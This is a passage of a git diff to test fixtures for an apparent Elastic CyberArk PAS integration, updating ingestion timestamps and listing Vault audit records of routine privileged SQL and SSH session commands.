1\\\\=[HELP]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=800B;SrcHost=127.0.0.1;User=HR;VIDOffset=14T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:54\",\"IsoTimestamp\":\"2021-03-25T14:56:54Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT INFO FROM SYSTEM.HELP WHERE UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 1\\\\=[HELP]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=800B;SrcHost=127.0.0.1;User=HR;VIDOffset=14T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -935,7 +935,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.776982800Z", + "ingested": "2021-12-09T13:36:58.683132100Z", "original": "\u003c5\u003e1 2021-03-25T14:58:02Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:58:02\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:58:02Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT * FROM DBA_USERS;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1097B;SrcHost=127.0.0.1;User=HR;VIDOffset=82T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:58:02\",\"IsoTimestamp\":\"2021-03-25T14:58:02Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT * FROM DBA_USERS;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1097B;SrcHost=127.0.0.1;User=HR;VIDOffset=82T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -1054,7 +1054,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.776985100Z", + "ingested": "2021-12-09T13:36:58.683136Z", "original": "\u003c5\u003e1 2021-03-25T14:57:05Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:57:05\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:57:05Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT INFO FROM SYSTEM.HELP WHERE UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 1\\\\=[SHOW%]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=948B;SrcHost=127.0.0.1;User=HR;VIDOffset=25T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:57:05\",\"IsoTimestamp\":\"2021-03-25T14:57:05Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT INFO FROM SYSTEM.HELP WHERE UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 1\\\\=[SHOW%]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=948B;SrcHost=127.0.0.1;User=HR;VIDOffset=25T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -1173,7 +1173,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.776987300Z", + "ingested": "2021-12-09T13:36:58.683141300Z", "original": "\u003c5\u003e1 2021-03-25T14:58:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:58:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:58:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=select distinct owner from all_objects;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1153B;SrcHost=127.0.0.1;User=HR;VIDOffset=124T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:58:44\",\"IsoTimestamp\":\"2021-03-25T14:58:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=select distinct owner from all_objects;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1153B;SrcHost=127.0.0.1;User=HR;VIDOffset=124T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log index 6c959f21d65..c6311470971 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log @@ -1,7 +1,7 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\n 10.2.0.7\n \n \n \n \n Command=ls \"/var/tmp\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"361","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=ls \"/var/tmp\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}} -<5>1 2021-03-14T13:49:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:49\n 2021-03-14T13:49:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:49","IsoTimestamp":"2021-03-14T13:49:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:32:04Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:32:04\n 2021-03-15T10:32:04Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:32:04","IsoTimestamp":"2021-03-15T10:32:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:33:47Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:47\n 2021-03-15T10:33:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo 